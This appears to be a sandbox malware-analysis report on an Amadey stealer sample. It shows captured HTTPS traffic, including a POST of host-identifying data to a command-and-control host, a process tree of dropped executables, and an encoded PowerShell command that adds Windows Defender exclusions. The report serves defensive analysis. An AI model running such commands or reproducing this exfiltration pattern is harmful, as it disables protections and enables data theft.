                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GmjlGbfXPBwbQhsHjUnk757HsK%2FBvMofG9pc8sZaP1xL923wk7bsFLd%2FBTBXmCBkxTGLhA3EEvYgHyLFE3GzJkLqzjoHyj3%2FW6aXPflgPWwK6rbl6JJAJxN3IXy55cl0EIof8%2B0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8f2a6afb9f6fc338-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1547&min_rtt=1547&rtt_var=773&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4232&recv_bytes=948&delivery_rate=223139&cwnd=228&unsent_bytes=0&cid=2c21d04510326a6e&ts=766&x=0"
                                                                                                                                                                                              2024-12-16 00:04:46 UTC353INData Raw: 34 39 31 63 0d 0a 49 30 47 34 4c 4c 4d 2b 62 34 62 6b 68 74 6b 68 2b 54 47 4b 64 64 50 33 64 75 33 45 61 45 72 45 74 46 52 38 4b 79 50 66 6c 59 39 59 59 38 34 4f 69 51 70 44 70 4a 66 6a 2b 78 75 4e 51 2f 38 51 2f 39 55 58 69 65 5a 53 4c 4b 58 59 4a 78 6b 48 41 61 6e 34 72 52 6b 6e 32 55 44 41 57 30 4f 6b 67 66 37 37 47 36 4a 4b 71 42 43 39 31 55 7a 50 6f 51 49 6f 70 64 67 32 48 55 42 4d 72 2f 6e 73 53 79 33 66 52 4e 5a 64 43 2b 65 49 36 37 78 45 6e 46 44 67 47 37 71 61 48 6f 44 6d 52 47 69 68 7a 6e 5a 47 43 57 36 36 34 65 35 75 49 4d 74 48 6b 55 4e 44 2f 63 62 6a 74 77 50 44 45 2b 73 51 73 5a 73 51 69 61 38 41 49 71 7a 51 4e 78 68 42 55 37 62 7a 35 30 73 6a 33 45 58 63 56 42 2f 71 67 75 79 33 51 70 5a 51 71 46 6e 78 6b 67 7a 50 2f 6b 70 37 6c 4e 55 6e 44
                                                                                                                                                                                              Data Ascii: 491cI0G4LLM+b4bkhtkh+TGKddP3du3EaErEtFR8KyPflY9YY84OiQpDpJfj+xuNQ/8Q/9UXieZSLKXYJxkHAan4rRkn2UDAW0Okgf77G6JKqBC91UzPoQIopdg2HUBMr/nsSy3fRNZdC+eI67xEnFDgG7qaHoDmRGihznZGCW664e5uIMtHkUND/cbjtwPDE+sQsZsQia8AIqzQNxhBU7bz50sj3EXcVB/qguy3QpZQqFnxkgzP/kp7lNUnD
                                                                                                                                                                                              2024-12-16 00:04:46 UTC1369INData Raw: 51 55 51 33 32 6a 75 2b 77 52 6f 6c 59 34 52 71 38 6c 52 6d 46 71 51 6b 6f 6f 64 77 38 45 55 4e 46 73 50 72 72 51 53 4f 61 41 4a 46 62 46 61 54 65 70 4a 68 47 69 31 54 6b 41 66 4f 76 56 4a 44 6f 45 32 69 68 32 6e 5a 47 43 55 6d 34 39 4f 35 4b 4c 4e 6c 47 32 6b 34 4e 39 6f 44 70 76 6c 47 64 56 75 59 64 73 6f 63 65 67 61 41 4a 49 61 33 66 4d 78 6c 4e 41 66 4f 33 36 6c 6c 6a 67 67 37 77 55 51 62 6f 6a 50 4f 37 41 34 51 64 38 56 65 32 6d 56 54 58 35 67 34 70 6f 74 63 79 45 45 64 46 73 66 48 6a 54 43 7a 63 52 4e 46 62 42 2b 79 4f 35 62 5a 49 6c 46 50 74 47 72 57 54 47 49 36 6a 53 6d 62 6d 30 53 35 65 45 51 47 54 38 4f 35 54 59 65 39 4e 33 31 49 4b 38 73 62 37 39 56 72 62 56 4f 52 58 36 64 55 61 69 71 6b 59 4b 62 54 54 4f 41 78 46 52 4c 76 36 37 6b 38 6a 33 30
                                                                                                                                                                                              Data Ascii: QUQ32ju+wRolY4Rq8lRmFqQkoodw8EUNFsPrrQSOaAJFbFaTepJhGi1TkAfOvVJDoE2ih2nZGCUm49O5KLNlG2k4N9oDpvlGdVuYdsocegaAJIa3fMxlNAfO36lljgg7wUQbojPO7A4Qd8Ve2mVTX5g4potcyEEdFsfHjTCzcRNFbB+yO5bZIlFPtGrWTGI6jSmbm0S5eEQGT8O5TYe9N31IK8sb79VrbVORX6dUaiqkYKbTTOAxFRLv67k8j30
                                                                                                                                                                                              2024-12-16 00:04:46 UTC1369INData Raw: 38 73 62 37 39 56 72 62 56 4f 52 58 36 64 55 5a 68 36 4d 50 4a 36 66 63 4f 42 74 44 54 62 58 35 37 6c 4d 73 33 6b 37 64 56 41 66 70 69 4f 43 7a 53 70 42 59 37 68 65 77 6e 31 54 42 35 67 30 77 35 6f 35 32 4b 6b 35 4e 73 50 69 76 64 43 44 55 51 4e 5a 4b 54 66 76 49 2f 66 74 45 6c 78 4f 77 56 37 32 63 46 49 53 73 44 69 69 68 32 7a 4d 64 54 6b 4b 77 38 4f 64 50 4a 4e 35 43 32 46 45 4c 35 49 48 67 76 6c 47 65 57 75 51 62 38 64 74 55 69 4c 35 4b 63 4f 62 35 4d 51 68 4b 62 72 37 6d 35 41 45 38 6c 46 65 52 57 77 47 6b 33 71 53 38 52 70 4e 59 37 68 2b 78 68 78 47 42 72 51 73 69 6f 4e 63 37 45 6b 39 42 76 50 66 72 54 53 50 64 53 63 4e 4f 43 4f 4b 55 37 76 73 4e 32 31 54 77 56 2b 6e 56 49 70 2b 78 47 7a 37 6b 34 7a 55 51 52 30 61 72 74 2f 49 50 4f 70 70 4a 33 52 78
                                                                                                                                                                                              Data Ascii: 8sb79VrbVORX6dUZh6MPJ6fcOBtDTbX57lMs3k7dVAfpiOCzSpBY7hewn1TB5g0w5o52Kk5NsPivdCDUQNZKTfvI/ftElxOwV72cFISsDiih2zMdTkKw8OdPJN5C2FEL5IHgvlGeWuQb8dtUiL5KcOb5MQhKbr7m5AE8lFeRWwGk3qS8RpNY7h+xhxGBrQsioNc7Ek9BvPfrTSPdScNOCOKU7vsN21TwV+nVIp+xGz7k4zUQR0art/IPOppJ3Rx
                                                                                                                                                                                              2024-12-16 00:04:46 UTC1369INData Raw: 72 5a 49 6c 46 6a 36 46 37 79 52 47 49 75 75 41 53 4c 6d 6d 48 59 5a 55 51 48 6c 74 39 68 4d 4c 4e 70 4e 78 78 77 53 71 70 2b 6b 76 45 2f 62 43 36 67 62 76 35 55 62 67 36 6f 42 49 4b 66 61 4f 42 6c 4d 53 4c 58 2f 2f 30 41 6e 30 6b 2f 66 55 77 7a 67 67 2b 47 2f 52 4a 39 56 35 31 66 2f 31 52 4f 58 35 6c 4a 6f 69 66 45 44 58 47 68 37 2f 65 69 6a 57 47 50 64 51 70 45 45 54 65 69 46 36 4c 4e 4d 6e 56 72 6b 48 62 69 65 47 49 53 69 42 69 47 6a 30 44 63 62 54 45 43 35 2b 2b 64 48 49 4e 6c 42 33 6c 4d 46 70 4d 69 6b 76 46 76 62 43 36 67 79 70 70 34 61 69 65 59 56 5a 72 2b 57 4d 52 49 4a 47 66 33 37 35 45 63 6c 33 30 4c 51 57 67 58 68 6a 75 43 36 52 5a 31 51 35 78 4f 30 6c 42 75 4c 71 67 51 69 70 39 63 36 46 55 5a 4b 75 4c 65 6a 41 53 54 43 44 6f 6b 63 50 4f 65 51
                                                                                                                                                                                              Data Ascii: rZIlFj6F7yRGIuuASLmmHYZUQHlt9hMLNpNxxwSqp+kvE/bC6gbv5Ubg6oBIKfaOBlMSLX//0An0k/fUwzgg+G/RJ9V51f/1ROX5lJoifEDXGh7/eijWGPdQpEETeiF6LNMnVrkHbieGISiBiGj0DcbTEC5++dHINlB3lMFpMikvFvbC6gypp4aieYVZr+WMRIJGf375Ecl30LQWgXhjuC6RZ1Q5xO0lBuLqgQip9c6FUZKuLejASTCDokcPOeQ
                                                                                                                                                                                              2024-12-16 00:04:46 UTC1369INData Raw: 52 66 71 46 6e 78 6b 67 7a 50 2f 6b 6f 47 72 63 55 68 48 55 64 4b 71 2b 79 74 58 6d 33 44 44 74 5a 51 54 62 7a 47 35 37 42 49 6e 31 50 6b 46 37 57 59 46 4a 32 70 44 53 2b 76 33 53 51 55 54 6b 61 32 2f 2b 5a 4f 4a 63 68 43 33 30 34 49 39 70 53 6b 39 51 4f 63 53 36 68 50 38 61 4d 54 6e 37 59 4a 61 70 66 41 4e 51 68 43 54 4c 47 33 38 67 38 36 6d 6b 6e 64 48 46 57 6b 67 4f 75 79 51 4a 52 53 34 52 75 38 6b 42 32 4b 70 77 77 73 72 4e 77 32 47 45 39 41 75 50 33 75 51 43 6e 54 53 64 6c 62 44 76 62 47 71 76 74 45 67 78 4f 77 56 35 69 53 42 6f 47 32 53 6a 66 6f 7a 33 59 5a 52 51 48 6c 74 2b 6c 4c 4c 4e 35 4a 33 56 6f 49 34 6f 76 6c 74 45 4b 62 58 4f 77 63 75 4a 4d 56 67 71 4d 48 4c 4c 54 63 50 52 46 46 53 4c 48 36 72 51 39 6a 33 56 61 52 42 45 33 56 69 2b 71 31 52
                                                                                                                                                                                              Data Ascii: RfqFnxkgzP/koGrcUhHUdKq+ytXm3DDtZQTbzG57BIn1PkF7WYFJ2pDS+v3SQUTka2/+ZOJchC304I9pSk9QOcS6hP8aMTn7YJapfANQhCTLG38g86mkndHFWkgOuyQJRS4Ru8kB2KpwwsrNw2GE9AuP3uQCnTSdlbDvbGqvtEgxOwV5iSBoG2Sjfoz3YZRQHlt+lLLN5J3VoI4ovltEKbXOwcuJMVgqMHLLTcPRFFSLH6rQ9j3VaRBE3Vi+q1R
                                                                                                                                                                                              2024-12-16 00:04:46 UTC1369INData Raw: 63 74 4a 67 5a 67 71 55 4d 4c 71 33 61 4a 42 64 4a 51 72 61 33 6f 77 45 6b 77 67 36 4a 48 43 37 7a 6b 4f 36 38 54 34 31 59 36 52 53 6e 6d 41 54 50 36 45 6f 35 6f 63 64 32 52 6c 39 52 71 76 44 79 44 7a 71 61 53 64 30 63 56 61 53 41 37 62 31 45 6e 56 33 36 45 72 65 61 47 34 61 76 44 69 43 6c 31 6a 49 61 54 6b 53 2b 2b 2b 5a 47 49 4e 56 4b 32 46 49 45 36 38 61 71 2b 30 53 44 45 37 42 58 6b 49 34 58 67 36 74 4b 4e 2b 6a 50 64 68 6c 46 41 65 57 33 34 55 38 6d 32 6b 54 58 57 41 6a 69 6a 4f 47 37 53 4a 68 63 37 42 47 31 6d 68 53 45 72 77 73 75 6f 39 77 39 47 45 52 43 75 2f 47 74 44 32 50 64 56 70 45 45 54 63 53 64 36 62 64 45 32 30 79 6d 44 76 47 53 47 4d 2f 2b 53 69 4f 71 30 6a 45 65 52 45 4b 31 38 75 6c 4c 4a 74 70 47 77 31 51 4e 34 35 54 32 75 30 71 65 58 2b
                                                                                                                                                                                              Data Ascii: ctJgZgqUMLq3aJBdJQra3owEkwg6JHC7zkO68T41Y6RSnmATP6Eo5ocd2Rl9RqvDyDzqaSd0cVaSA7b1EnV36EreaG4avDiCl1jIaTkS+++ZGINVK2FIE68aq+0SDE7BXkI4Xg6tKN+jPdhlFAeW34U8m2kTXWAjijOG7SJhc7BG1mhSErwsuo9w9GERCu/GtD2PdVpEETcSd6bdE20ymDvGSGM/+SiOq0jEeREK18ulLJtpGw1QN45T2u0qeX+
                                                                                                                                                                                              2024-12-16 00:04:46 UTC1369INData Raw: 42 6f 79 32 43 53 65 33 36 48 5a 47 55 48 2f 39 2f 50 74 47 4d 39 6c 59 32 6c 45 42 39 62 69 6b 34 78 66 4a 41 62 70 46 34 34 70 55 6b 4a 6c 45 61 4b 65 57 62 69 64 51 41 61 75 33 74 52 4e 74 6d 6c 79 52 42 45 32 6a 68 66 61 70 52 5a 68 46 36 31 43 50 71 7a 4f 5a 72 41 30 34 6f 63 45 35 58 67 63 42 73 72 65 31 65 47 50 54 53 63 70 4e 47 2b 6d 57 34 2f 74 38 31 52 50 77 56 2b 6e 56 49 59 79 6f 42 43 2b 77 78 33 73 35 58 30 75 36 35 2b 70 57 4c 4a 6f 41 6b 56 70 4e 76 4e 57 71 2b 30 65 4b 45 37 42 48 34 38 35 42 33 50 46 61 65 72 6d 59 4c 31 35 66 41 65 57 6c 6f 77 45 78 6d 68 61 52 47 77 37 32 6c 4f 4b 34 56 5a 67 55 31 69 6d 57 6a 78 6d 4a 73 52 73 57 6d 4e 45 73 45 30 39 57 72 4c 76 34 51 69 33 55 53 63 63 63 51 36 53 4a 70 4f 4e 36 32 78 75 6f 4b 50 2f
                                                                                                                                                                                              Data Ascii: Boy2CSe36HZGUH/9/PtGM9lY2lEB9bik4xfJAbpF44pUkJlEaKeWbidQAau3tRNtmlyRBE2jhfapRZhF61CPqzOZrA04ocE5XgcBsre1eGPTScpNG+mW4/t81RPwV+nVIYyoBC+wx3s5X0u65+pWLJoAkVpNvNWq+0eKE7BH485B3PFaermYL15fAeWlowExmhaRGw72lOK4VZgU1imWjxmJsRsWmNEsE09WrLv4Qi3UScccQ6SJpON62xuoKP/
                                                                                                                                                                                              2024-12-16 00:04:46 UTC1369INData Raw: 56 39 37 38 59 5a 6b 41 51 64 59 2f 65 47 74 47 58 47 55 44 73 4d 63 56 61 54 42 35 36 6c 52 6e 56 44 2b 46 50 61 72 4b 71 69 6f 44 53 6d 77 78 69 45 52 64 33 2b 6f 39 4f 4e 50 4a 4d 78 66 6b 52 4a 4e 36 38 61 38 67 67 50 54 45 39 64 5a 38 59 31 55 31 2b 59 2f 4b 36 6a 59 4d 51 68 59 44 4a 72 35 36 6b 41 31 79 6c 6e 65 48 45 4f 6b 67 4b 54 6a 45 64 55 54 37 41 62 78 7a 55 54 64 2f 56 39 37 38 59 5a 6b 41 51 64 59 2f 65 47 74 47 58 47 55 44 73 4d 63 56 61 54 42 35 36 6c 52 6e 56 44 2b 46 50 61 72 4b 71 69 6f 44 53 6d 77 78 69 45 52 42 6d 2b 4c 31 74 4e 2f 4e 74 6c 41 33 31 73 62 39 63 61 71 2b 30 7a 62 43 39 46 58 2b 64 55 72 77 65 59 53 61 50 36 57 41 78 31 48 54 37 72 68 2f 41 77 45 31 45 6e 51 53 68 33 7a 69 61 75 56 64 62 6f 54 70 6c 65 33 31 55 7a 64
                                                                                                                                                                                              Data Ascii: V978YZkAQdY/eGtGXGUDsMcVaTB56lRnVD+FParKqioDSmwxiERd3+o9ONPJMxfkRJN68a8ggPTE9dZ8Y1U1+Y/K6jYMQhYDJr56kA1ylneHEOkgKTjEdUT7AbxzUTd/V978YZkAQdY/eGtGXGUDsMcVaTB56lRnVD+FParKqioDSmwxiERBm+L1tN/NtlA31sb9caq+0zbC9FX+dUrweYSaP6WAx1HT7rh/AwE1EnQSh3ziauVdboTple31Uzd
                                                                                                                                                                                              2024-12-16 00:04:46 UTC1369INData Raw: 76 45 4d 51 35 4b 41 34 7a 68 37 6b 45 74 33 51 36 66 48 42 57 6b 33 71 53 57 55 5a 78 44 36 31 66 2f 31 52 6a 50 2f 6b 6f 6c 74 4e 45 6d 48 51 56 47 70 2f 43 74 58 6d 33 44 44 73 63 63 56 62 66 49 70 4b 6b 44 77 78 4f 76 47 62 79 55 46 34 47 6c 47 44 71 67 31 53 41 64 44 6e 2b 44 32 76 39 47 4d 39 6b 4d 34 46 45 4a 38 70 50 6e 71 30 53 6c 62 63 55 46 74 6f 55 58 7a 59 6f 4e 4a 61 72 6f 43 43 6c 59 52 71 32 31 79 30 49 31 32 51 36 66 48 42 57 6b 33 71 53 57 55 5a 78 44 36 31 57 64 6b 68 6d 44 35 68 56 6d 76 35 59 67 58 68 45 53 38 37 66 2f 41 58 75 61 43 64 4a 4f 48 2b 4b 46 38 72 67 45 70 57 33 46 42 62 61 46 46 38 32 58 42 79 79 77 77 7a 55 4f 54 6e 2b 44 32 76 39 47 4d 39 6b 4d 39 47 5a 50 31 5a 44 6e 75 30 32 63 45 36 5a 58 71 64 56 4d 7a 34 73 59 4c
                                                                                                                                                                                              Data Ascii: vEMQ5KA4zh7kEt3Q6fHBWk3qSWUZxD61f/1RjP/koltNEmHQVGp/CtXm3DDsccVbfIpKkDwxOvGbyUF4GlGDqg1SAdDn+D2v9GM9kM4FEJ8pPnq0SlbcUFtoUXzYoNJaroCClYRq21y0I12Q6fHBWk3qSWUZxD61WdkhmD5hVmv5YgXhES87f/AXuaCdJOH+KF8rgEpW3FBbaFF82XByywwzUOTn+D2v9GM9kM9GZP1ZDnu02cE6ZXqdVMz4sYL


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                              18192.168.2.450174104.21.79.7443
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-12-16 00:04:48 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=Z9LQRK575GYQ5C
                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                              Content-Length: 18138
                                                                                                                                                                                              Host: drive-connect.cyou
                                                                                                                                                                                              2024-12-16 00:04:48 UTC15331OUTData Raw: 2d 2d 5a 39 4c 51 52 4b 35 37 35 47 59 51 35 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 37 38 31 37 46 41 41 43 32 43 38 45 39 44 32 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 5a 39 4c 51 52 4b 35 37 35 47 59 51 35 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 39 4c 51 52 4b 35 37 35 47 59 51 35 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 5a 39 4c 51 52 4b 35 37 35
                                                                                                                                                                                              Data Ascii: --Z9LQRK575GYQ5CContent-Disposition: form-data; name="hwid"07817FAAC2C8E9D223D904AF30EFEBBC--Z9LQRK575GYQ5CContent-Disposition: form-data; name="pid"2--Z9LQRK575GYQ5CContent-Disposition: form-data; name="lid"FATE99--test--Z9LQRK575
                                                                                                                                                                                              2024-12-16 00:04:48 UTC2807OUTData Raw: 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5
                                                                                                                                                                                              Data Ascii: (u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa


                                                                                                                                                                                              Statistics

                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                              Behavior

                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                              System Behavior

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                              Start time:19:00:00
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                              Imagebase:0xec0000
                                                                                                                                                                                              File size:3'026'432 bytes
                                                                                                                                                                                              MD5 hash:D2B1682105389A925387227C660ABB87
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.1771332626.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1731033404.0000000005450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                              Start time:19:00:04
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                                                                                                                                                              Imagebase:0x700000
                                                                                                                                                                                              File size:3'026'432 bytes
                                                                                                                                                                                              MD5 hash:D2B1682105389A925387227C660ABB87
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000002.1805516995.0000000000701000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.1765294388.0000000004FA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                              • Detection: 47%, ReversingLabs
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                              Start time:19:01:00
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                              Imagebase:0x700000
                                                                                                                                                                                              File size:3'026'432 bytes
                                                                                                                                                                                              MD5 hash:D2B1682105389A925387227C660ABB87
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000005.00000003.2321951308.00000000047B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                              Start time:19:01:10
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe"
                                                                                                                                                                                              Imagebase:0x2694ee40000
                                                                                                                                                                                              File size:89'640 bytes
                                                                                                                                                                                              MD5 hash:3C104350CC2661C345673E91ED672C4C
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2619824711.0000026950D01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000006.00000002.2656456541.0000026962821000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                              • Detection: 5%, ReversingLabs
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                              Start time:19:01:16
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exe"
                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                              File size:55'808 bytes
                                                                                                                                                                                              MD5 hash:D708CDCF904424E5CCFE7583EE1C7567
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                              • Detection: 3%, ReversingLabs
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                              Start time:19:01:16
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                              Imagebase:0x8a0000
                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              General

                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                              Start time:19:01:23
                                                                                                                                                                                              Start date:15/12/2024
                                                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUA
